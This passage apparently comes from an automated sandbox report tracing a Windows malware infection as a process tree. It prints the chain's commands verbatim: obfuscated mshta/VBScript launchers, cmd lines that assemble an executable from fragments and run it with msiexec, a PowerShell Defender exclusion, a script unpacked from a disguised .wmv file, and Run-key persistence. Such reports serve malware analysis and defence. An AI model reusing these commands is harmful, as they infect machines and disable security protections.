C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )13⤵PID:5824
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵PID:4964
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )13⤵PID:5744
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC14⤵PID:6740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵PID:7036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵PID:1704
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵PID:3060
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"9⤵PID:4944
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4944 -s 170410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1248
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"9⤵PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"9⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\is-GBLUO.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GBLUO.tmp\setup.tmp" /SL5="$4030C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"10⤵
- Loads dropped DLL
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT11⤵PID:6192
-
C:\Users\Admin\AppData\Local\Temp\is-JSVOK.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JSVOK.tmp\setup.tmp" /SL5="$80336,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT12⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\is-R7IAM.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-R7IAM.tmp\postback.exe" ss113⤵PID:6476
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart13⤵PID:5156
-
C:\11b57b19deb0e6b21c42\Setup.exeC:\11b57b19deb0e6b21c42\\Setup.exe /q /norestart /x86 /x64 /web14⤵
- Loads dropped DLL
- Checks processor information in registry
PID:1532
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss113⤵PID:7200
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵PID:12892
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵PID:13224
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵PID:13880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵PID:9328
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵PID:17436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵PID:17464
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵PID:2536
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵PID:7428
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst2.exe"C:\Users\Admin\AppData\Local\Temp\inst2.exe"9⤵PID:5576
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"9⤵PID:2160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3304
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"9⤵
- Loads dropped DLL
PID:3604 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:7820 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
- Suspicious use of FindShellTrayWindow
PID:10904 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee012⤵PID:11848
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1b4,0x1b8,0x1bc,0x12c,0x1c0,0x7ff65a4e9e70,0x7ff65a4e9e80,0x7ff65a4e9e9013⤵PID:11988
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:212⤵PID:12660
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=1784 /prefetch:812⤵PID:12688
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2632 /prefetch:112⤵PID:12848
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2612 /prefetch:112⤵PID:12836
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2456 /prefetch:812⤵PID:12828
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2908 /prefetch:812⤵PID:13216
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3240 /prefetch:212⤵
- Modifies registry class
PID:13984
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2484 /prefetch:812⤵PID:15192
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2796 /prefetch:812⤵PID:15656
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=1876 /prefetch:812⤵PID:15964
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2820 /prefetch:812⤵PID:16420
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"9⤵PID:7076
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7076 -s 190010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8508
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7076 -s 190010⤵
- Program crash
PID:8544
-
-
-
C:\Users\Admin\AppData\Local\Temp\28.exe"C:\Users\Admin\AppData\Local\Temp\28.exe"9⤵PID:1172
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"10⤵
- Loads dropped DLL
PID:2212
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"9⤵PID:5388
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5388 -s 224010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9072
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"9⤵PID:7412
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
PID:3792 -
C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵PID:2832
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\test.bat"9⤵PID:5408
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe" -Force8⤵PID:6728
-
-
C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"8⤵PID:5136
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"7⤵
- Executes dropped EXE
PID:2640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 2048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7640
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_tMp9XngZstVdtUhqc8dTUA1.exe"C:\Users\Admin\Pictures\Adobe Films\_tMp9XngZstVdtUhqc8dTUA1.exe"7⤵
- Executes dropped EXE
PID:1724
-
-
C:\Users\Admin\Pictures\Adobe Films\POhZnp_zz8JHALLWt8sLBpym.exe"C:\Users\Admin\Pictures\Adobe Films\POhZnp_zz8JHALLWt8sLBpym.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Users\Admin\Pictures\Adobe Films\9CX5qmuakiAzyoicv8wnw7ta.exe"C:\Users\Admin\Pictures\Adobe Films\9CX5qmuakiAzyoicv8wnw7ta.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2240 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:7276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 2808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6768
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1hR0WedLFCi2ffiQp2FL4Pi2.exe"C:\Users\Admin\Pictures\Adobe Films\1hR0WedLFCi2ffiQp2FL4Pi2.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5752
-
-
C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5612 -
C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6704
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2908
-
-
C:\Users\Admin\Pictures\Adobe Films\GZXD3irWc3TtUE5pa8tfTilC.exe"C:\Users\Admin\Pictures\Adobe Films\GZXD3irWc3TtUE5pa8tfTilC.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5812 -
C:\Windows\SysWOW64\svchost.exesvchost.exe8⤵PID:2128
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv8⤵PID:6416
-
C:\Windows\SysWOW64\cmd.execmd9⤵PID:5896
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv10⤵PID:6088
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.110⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
PID:2024
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6496 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵PID:4976
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mb2UC8iI_0pul48ZjDuP1Fip.exe"C:\Users\Admin\Pictures\Adobe Films\mb2UC8iI_0pul48ZjDuP1Fip.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"8⤵PID:5032
-
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
- Executes dropped EXE
PID:4796
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6204
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WY3JcH0zxuXuKZ0x9hFnf2GO.exe"C:\Users\Admin\Pictures\Adobe Films\WY3JcH0zxuXuKZ0x9hFnf2GO.exe"7⤵
- Executes dropped EXE
PID:5160
-
-
C:\Users\Admin\Pictures\Adobe Films\BAJsVPm1_iONxhvXOXHtjEzv.exe"C:\Users\Admin\Pictures\Adobe Films\BAJsVPm1_iONxhvXOXHtjEzv.exe"7⤵
- Executes dropped EXE
PID:6212 -
C:\Users\Admin\AppData\Roaming\3480205.exe"C:\Users\Admin\AppData\Roaming\3480205.exe"8⤵
- Executes dropped EXE
PID:1100
-
-
C:\Users\Admin\AppData\Roaming\28745.exe"C:\Users\Admin\AppData\Roaming\28745.exe"8⤵PID:5684
-
-
C:\Users\Admin\AppData\Roaming\1382360.exe"C:\Users\Admin\AppData\Roaming\1382360.exe"8⤵PID:5284
-
-
C:\Users\Admin\AppData\Roaming\3235482.exe"C:\Users\Admin\AppData\Roaming\3235482.exe"8⤵
- Adds Run key to start application
PID:6640 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:6052
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5696 -
C:\Users\Admin\Documents\OX41VEAQ6EuszyqVhhGIceuv.exe"C:\Users\Admin\Documents\OX41VEAQ6EuszyqVhhGIceuv.exe"8⤵PID:6636
-
C:\Users\Admin\Pictures\Adobe Films\DnMDKAawQTsPYfrL4e2YEVdQ.exe"C:\Users\Admin\Pictures\Adobe Films\DnMDKAawQTsPYfrL4e2YEVdQ.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:2628
-
-
C:\Users\Admin\Pictures\Adobe Films\unfr1fjq_KZVF_OkLYptkGos.exe"C:\Users\Admin\Pictures\Adobe Films\unfr1fjq_KZVF_OkLYptkGos.exe"9⤵PID:6252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2696
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rCdaGjHFWKZozXiMoUG92tz1.exe"C:\Users\Admin\Pictures\Adobe Films\rCdaGjHFWKZozXiMoUG92tz1.exe"9⤵PID:1960
-
-
C:\Users\Admin\Pictures\Adobe Films\nmEyKjzfrHBJARXEBKdYBLhv.exe"C:\Users\Admin\Pictures\Adobe Films\nmEyKjzfrHBJARXEBKdYBLhv.exe"9⤵PID:7580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 24410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4836
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EbytEU0df8drCuiqnG3K33RD.exe"C:\Users\Admin\Pictures\Adobe Films\EbytEU0df8drCuiqnG3K33RD.exe"9⤵PID:7668
-
-
